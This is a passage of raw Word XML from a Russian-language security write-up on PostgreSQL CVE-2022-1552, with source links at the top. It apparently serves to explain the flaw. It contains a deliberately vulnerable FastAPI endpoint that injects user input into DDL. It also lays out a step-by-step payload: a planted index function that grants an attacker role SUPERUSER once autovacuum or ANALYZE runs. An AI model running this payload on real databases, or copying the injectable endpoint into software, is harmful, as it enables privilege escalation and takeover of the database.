        <w:t>•   PostgreSQL Docs: «CREATE SCHEMA» (schema_element форма) — https://www.postgresql.org/docs/current/sql-createschema.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5F52F7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   PostgreSQL Docs: «Security» (secure schema usage) — https://www.postgresql.org/docs/current/ddl-schemas.html#DDL-SCHEMAS-PATTERNS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16FEA7B9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   PostgreSQL Release notes 15.3 (раздел Security Fixes) — https://www.postgresql.org/docs/release/15.3/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42751D74" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   NIST NVD: CVE-2023-2454 — https://nvd.nist.gov/vuln/detail/CVE-2023-2454</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F7BC4A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   R12 (sources/research.md, строки 209–222)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FF31DC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>3.13.3 Index expressions + autovacuum/REINDEX (CVE-2022-1552)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542889A1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Суть.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> До PostgreSQL 14.3 (и параллельных minor-фиксов) PostgreSQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не применял security restricted operation (SRO) sandbox</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> при вычислении index-expressions во время </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ANALYZE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>REINDEX</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CLUSTER</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>REFRESH MATERIALIZED VIEW</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, а также </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_amcheck</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Атакующий с правом CREATE на любой схеме создавал таблицу с index-expression, </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">ссылающимся на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>atk.evil()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — функция выполнялась под привилегиями той роли, которая запустила обслуживающую команду. Поскольку </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>autovacuum demon работает как superuser</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и регулярно запускает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ANALYZE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на всех таблицах автоматически, эта атака требовала только времени — без активного triggering.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3234D4FC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Уязвимый код.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDB85D0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># app/api/reports/custom_tables.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A9543B"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621122D7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>from sqlalchemy import text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46726FEA"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2F3C4DBC"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377EE416" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A010213" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>router = APIRouter()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B963D3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A377615" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@router.post("/reports/tables/{name}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB9FB10" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>async def create_report_table(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E1832F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    name: str,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27726AFB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    indexed_expression: str,  # user-supplied expression для function-based index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7EEEE8"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FA01E4F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB7A96C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # multi-tenant analytics: пользователь создаёт свою отчётную таблицу</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CEB5D49" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # с произвольным index expression для performance optimization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C66BD8C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    query = text(f"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C82596F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        CREATE TABLE tenant_X.{name} (id serial, val numeric);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FADCC4C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        CREATE INDEX ON tenant_X.{name} (({indexed_expression}));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69833255" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    """)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692EE5F5"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4738C43E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Конкатенация </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>indexed_expression</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в DDL + application-роль с правом CREATE на схему </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tenant_X</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (типично для analytics-платформ с per-tenant schemas). Атакующий передаёт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>indexed_expression</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> со ссылкой на свою функцию.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67CD4900" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload — index-expression trap + autovacuum trigger</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="497673F8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Шаг 1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (от application-роли с CREATE на схеме </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tenant_X</w:t>
      </w:r>
      <w:r>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604BCB4E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE SCHEMA IF NOT EXISTS atk;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C363D9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20DA66FB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE FUNCTION atk.evil(numeric) RETURNS numeric LANGUAGE plpgsql AS $$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75AD7B47" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>BEGIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5F59AB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  ALTER ROLE postgres_attacker SUPERUSER;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FFA6CD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  RETURN $1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71AECA5B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>END;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5995F4A0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$$;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D689CB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>postgres_attacker</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — заранее созданная роль атакующего (через SQLi на предыдущем этапе или через legitimate signup). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ALTER ROLE ... SUPERUSER</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> требует superuser-привилегии — это и есть финальная цель эскалации.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097131A0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Шаг 2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (через уязвимый endpoint):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56898AC9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>name = "reports_q4"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759E1BAE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>indexed_expression = "atk.evil(val)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D98DA2C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Сервер видит:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF69C7A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE TABLE tenant_X.reports_q4 (id serial, val numeric);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EDDF400" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE INDEX ON tenant_X.reports_q4 ((atk.evil(val)));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E66B41" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Index создан. Таблица пустая, ничего не вычисляется немедленно. На этом активные действия атакующего закончены.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19AD92DA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Шаг 3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (trigger — пассивный, ждёт):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E780CD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- Атакующий или сам admin/cron вставляет тестовые данные:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7644F683" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>INSERT INTO tenant_X.reports_q4 (val) SELECT generate_series(1, 100);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB1E8B7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Или просто ждёт, пока autovacuum-demon придёт обработать таблицу. Когда autovacuum (или admin вручную) выполняет:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A398854" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ANALYZE tenant_X.reports_q4;</w:t>
      </w:r>
    </w:p>
